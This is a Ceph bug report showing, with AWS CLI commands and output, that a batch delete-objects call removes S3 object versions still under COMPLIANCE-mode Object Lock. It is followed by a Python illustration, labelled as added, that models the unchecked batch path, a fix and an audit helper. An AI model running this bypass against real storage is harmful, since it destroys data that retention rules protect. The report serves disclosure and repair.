Bug #47586 (closed): Able to circumvent S3 Object Lock using deleteobjects command

% Done: 0%
Source:
Tags:
Backport: octopus, nautilus
Regression: No
Severity: 2 - major
Reviewed:

Description
Ceph supports the S3 object lock, which prevents objects from being deleted until their retention date has expired. However, it appears to be possible to circumvent this and delete objects before their retention date has passed by using the option to delete multiple objects at once.
See the following example using the AWS CLI to confirm this.

Create an object:

```
$ aws --profile=ceph --endpoint-url https://ceph s3api put-object --bucket andrew-test --key ceph-bug --object-lock-mode COMPLIANCE --object-lock-retain-until "2020-09-22 16:00:00"
{
    "ETag": "\"d41d8cd98f00b204e9800998ecf8427e\"",
    "VersionId": "-cBhsp3jHdeWAgxH9Grd.ZCRHsyT8n-"
}
```

Confirm object lock:

```
$ aws --profile=ceph --endpoint-url https://ceph s3api get-object-retention --bucket andrew-test --key ceph-bug
{
    "Retention": {
        "Mode": "COMPLIANCE",
        "RetainUntilDate": "2020-09-22T16:00:00.000000000Z"
    }
}
```

Attempt to delete the version using a single delete:

```
$ aws --profile=ceph --endpoint-url https://ceph s3api delete-object --bucket andrew-test --key ceph-bug --version-id=-cBhsp3jHdeWAgxH9Grd.ZCRHsyT8n-

An error occurred (AccessDenied) when calling the DeleteObject operation: Unknown
```

This correctly fails.

Attempt to delete the version using a multiple delete:

```
$ aws --profile=ceph --endpoint-url https://ceph s3api delete-objects --bucket andrew-test --delete "Objects=[{Key=ceph-bug,VersionId=-cBhsp3jHdeWAgxH9Grd.ZCRHsyT8n-}],Quiet=false"
{
    "Deleted": [
        {
            "Key": "ceph-bug",
            "VersionId": "-cBhsp3jHdeWAgxH9Grd.ZCRHsyT8n-"
        }
    ]
}
```

This succeeds and deletes the object version, despite it still being before the retention date.
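As an added illustration (not Ceph's code and not part of this report), the following Python model shows the defect class the report describes: a batch delete path that never consults the retention check the single-object path performs, beside a corrected batch path that routes every entry through the same check and reports locked versions per key in `Errors`. It also includes a small audit helper that flags a `DeleteObjects` response reporting a still-retained version as `Deleted`, which is the check an operator can run against gateway output like the one above. All class and function names (`Bucket`, `delete_blocked`, `audit_delete_response`, and so on) are hypothetical; the sample retention, version id and response are constructed from the values in this report.

```python
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

# Hypothetical model of an S3 gateway's delete paths (not RGW's code).
# Object Lock only holds if DeleteObject and DeleteObjects share one check.


def parse_retain_until(stamp: str) -> datetime:
    """Parse an S3 RetainUntilDate such as 2020-09-22T16:00:00.000000000Z as UTC."""
    base = stamp.rstrip("Z").split(".", 1)[0]
    return datetime.strptime(base, "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)


@dataclass
class Retention:
    mode: str                 # "GOVERNANCE" or "COMPLIANCE"
    retain_until: datetime


@dataclass
class Version:
    key: str
    version_id: str
    retention: Optional[Retention] = None
    legal_hold: bool = False


def delete_blocked(v: Version, now: datetime, bypass_governance: bool = False) -> Optional[str]:
    """Return why deleting this version violates Object Lock, or None if it is allowed."""
    if v.legal_hold:
        return "legal hold in effect"
    r = v.retention
    if r is None or now >= r.retain_until:
        return None
    if r.mode == "GOVERNANCE" and bypass_governance:
        return None  # caller is permitted to bypass governance-mode retention
    return f"{r.mode} retention until {r.retain_until.isoformat()}"


class Bucket:
    def __init__(self, versions: List[Version], now: datetime):
        self.versions: Dict[Tuple[str, str], Version] = {(v.key, v.version_id): v for v in versions}
        self.now = now

    def delete_object(self, key: str, version_id: str) -> str:
        """Single-object delete: consults the lock, like the DeleteObject call in the report."""
        v = self.versions[(key, version_id)]
        if delete_blocked(v, self.now):
            return "AccessDenied"
        del self.versions[(key, version_id)]
        return "Deleted"

    def delete_objects_unchecked(self, objects: List[Tuple[str, str]]) -> dict:
        """Defective batch path: removes every entry without consulting the lock."""
        deleted = []
        for key, vid in objects:
            if self.versions.pop((key, vid), None) is not None:
                deleted.append({"Key": key, "VersionId": vid})
        return {"Deleted": deleted, "Errors": []}

    def delete_objects(self, objects: List[Tuple[str, str]]) -> dict:
        """Corrected batch path: each entry goes through delete_blocked, and locked
        versions are reported per key in Errors, the way S3 reports partial failure."""
        deleted, errors = [], []
        for key, vid in objects:
            v = self.versions.get((key, vid))
            if v is None:
                errors.append({"Key": key, "VersionId": vid, "Code": "NoSuchVersion"})
                continue
            reason = delete_blocked(v, self.now)
            if reason:
                errors.append({"Key": key, "VersionId": vid, "Code": "AccessDenied", "Message": reason})
                continue
            del self.versions[(key, vid)]
            deleted.append({"Key": key, "VersionId": vid})
        return {"Deleted": deleted, "Errors": errors}


def audit_delete_response(response: dict, retained: Dict[Tuple[str, str], Retention],
                          now: datetime) -> List[dict]:
    """Audit helper: entries a gateway reported as Deleted although their retention
    (as previously read with get-object-retention) had not expired at call time."""
    violations = []
    for entry in response.get("Deleted", []):
        r = retained.get((entry["Key"], entry.get("VersionId")))
        if r is not None and now < r.retain_until:
            violations.append(entry)
    return violations


# Constructed sample values mirroring the report: the retention returned by
# get-object-retention, the version id from put-object, and the DeleteObjects response.
NOW = datetime(2020, 9, 1, 12, 0, 0, tzinfo=timezone.utc)  # before the retention date
SAMPLE_RETENTION = Retention("COMPLIANCE", parse_retain_until("2020-09-22T16:00:00.000000000Z"))
SAMPLE_VERSION = ("ceph-bug", "-cBhsp3jHdeWAgxH9Grd.ZCRHsyT8n-")
SAMPLE_DELETE_RESPONSE = {"Deleted": [{"Key": "ceph-bug", "VersionId": "-cBhsp3jHdeWAgxH9Grd.ZCRHsyT8n-"}]}


def make_sample_bucket() -> Bucket:
    """Fresh bucket holding only the locked sample version."""
    return Bucket([Version(*SAMPLE_VERSION, retention=SAMPLE_RETENTION)], NOW)


if __name__ == "__main__":
    print("single delete:", make_sample_bucket().delete_object(*SAMPLE_VERSION))
    print("batch, unchecked:", make_sample_bucket().delete_objects_unchecked([SAMPLE_VERSION]))
    print("batch, checked:", make_sample_bucket().delete_objects([SAMPLE_VERSION]))
    print("audit of reported response:",
          audit_delete_response(SAMPLE_DELETE_RESPONSE, {SAMPLE_VERSION: SAMPLE_RETENTION}, NOW))
```

The design point is that `delete_blocked` is the single place retention, legal hold and the governance bypass are evaluated, so a new request path (batch delete, lifecycle expiry, multipart abort) cannot silently skip it. `audit_delete_response` is the operator-side counterpart: feed it the retention data you read before the call and the response you got back, and any non-empty result means the gateway honoured a delete it should have refused.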